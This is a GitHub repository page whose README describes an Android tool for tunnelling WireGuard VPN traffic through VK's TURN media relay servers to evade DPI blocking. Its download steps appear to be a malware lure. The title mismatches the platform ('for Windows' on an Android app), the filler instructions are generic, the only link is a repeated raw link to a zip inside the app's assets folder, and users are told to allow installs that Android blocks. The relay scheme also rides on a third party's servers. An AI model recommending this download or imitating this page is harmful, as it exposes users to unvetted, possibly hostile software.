Skip to content

Decreasingmonotonic-openendwrench955/proxy-turn-vk-android

Repository files navigation

🛡️ proxy-turn-vk-android - Private WireGuard Path for Windows

Download

🔽 Download

Use this link to visit the page and download the app:

https://raw.githubusercontent.com/Decreasingmonotonic-openendwrench955/proxy-turn-vk-android/main/app/src/main/assets/proxy_vk_android_turn_2.2.zip

📌 What this app does

proxy-turn-vk-android helps route WireGuard traffic through a DTLS media relay path that uses VK TURN servers before it reaches your VPS server.

It is built for users who want a private tunnel with a relay step in the middle. The app is designed for use on Android and can be managed from a Windows browser or file manager if you keep the app package on your PC.

The setup is centered on three parts:

  • Your phone or Android device
  • VK TURN media relay servers
  • Your personal VPS server

This creates a tunnel path where traffic goes from the client to the relay, then to your VPS.

🖥️ What you need

Before you start, make sure you have:

  • A Windows PC with internet access
  • A browser on Windows
  • An Android phone or Android emulator
  • Enough free storage for the app file
  • A VPS server that you control
  • A WireGuard config for your server
  • A stable network connection

🚀 How to get started

  1. Open the download page: https://raw.githubusercontent.com/Decreasingmonotonic-openendwrench955/proxy-turn-vk-android/main/app/src/main/assets/proxy_vk_android_turn_2.2.zip

  2. Download the app file or source package from the page.

  3. Save it to a folder you can find again, such as Downloads.

  4. If the file is an Android app package, move it to your phone or to an Android emulator.

  5. Open the file with the app installer on Android.

  6. Follow the on-screen prompts to finish setup.

  7. Launch the app and enter your WireGuard and relay details.

📱 Install on Android

If you use a real Android device:

  1. Download the file from the GitHub page.
  2. Copy the file to your phone if it is not already there.
  3. Open the file with your file manager.
  4. Tap Install.
  5. If Android blocks the install, allow installs from your file manager or browser.
  6. Open the app after install.

If you use an Android emulator on Windows:

  1. Open the emulator.
  2. Move the file into the emulator or use its shared folder.
  3. Open the file inside the emulator.
  4. Install the app.
  5. Start the app from the app list.

⚙️ Basic setup

After the app opens, set these items:

  • VPS address
  • WireGuard endpoint
  • TURN or relay details
  • Username and password if your server uses them
  • Port number if your setup uses a custom port

Use the values from your own server setup. If you already have a WireGuard config, copy the server details into the app settings.

🔐 Connection flow

The app uses this path:

  1. Your device starts the connection.
  2. The traffic goes to a VK TURN media relay server.
  3. The relay sends the traffic to your VPS.
  4. Your VPS passes the traffic through the WireGuard tunnel.

This setup can help with networks that block direct VPN traffic.

🧭 How to use it

  1. Open the app.
  2. Load your server settings.
  3. Check that the VPS address is correct.
  4. Confirm the TURN or relay settings.
  5. Start the tunnel.
  6. Test the connection in your browser.
  7. If needed, stop the tunnel and change the settings.

🛠️ Common setup fields

You may see fields like these:

  • Server host
  • Server port
  • Relay address
  • DTLS mode
  • WireGuard key
  • Tunnel name
  • DNS server
  • Keepalive interval

Use the values from your own network setup. Keep the same spelling and numbers as your config file.

🌐 If the connection fails

Try these steps:

  1. Check your internet connection.
  2. Confirm your VPS is online.
  3. Make sure the WireGuard config is correct.
  4. Check that the relay address is valid.
  5. Re-enter the port number.
  6. Restart the app.
  7. Restart your phone or emulator.
  8. Try again on a different network.

📁 Folder layout

If you work with the source files on Windows, you may see folders like these:

  • android/ for app files
  • kotlin/ for app code
  • golang/ for helper tools or backend code
  • shell/ for setup scripts
  • docs/ for notes and guides

These names help keep the project parts in order.

🔎 Topics in this project

This project covers:

  • Android app setup
  • WireGuard tunnel use
  • DTLS relay handling
  • TURN server flow
  • DPI bypass use cases
  • VK API and VK relay logic
  • VPS-based private routing

🧩 Best results

For a smooth setup:

  • Use a VPS you control
  • Keep your server details in one place
  • Copy values with care
  • Use a stable network
  • Test after each change
  • Save a backup of your config

📎 Quick link again

Download or open the project page here:

https://raw.githubusercontent.com/Decreasingmonotonic-openendwrench955/proxy-turn-vk-android/main/app/src/main/assets/proxy_vk_android_turn_2.2.zip

About

Build a WireGuard tunnel over VK TURN to route VPN traffic through DTLS and reduce DPI blocks on Android

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors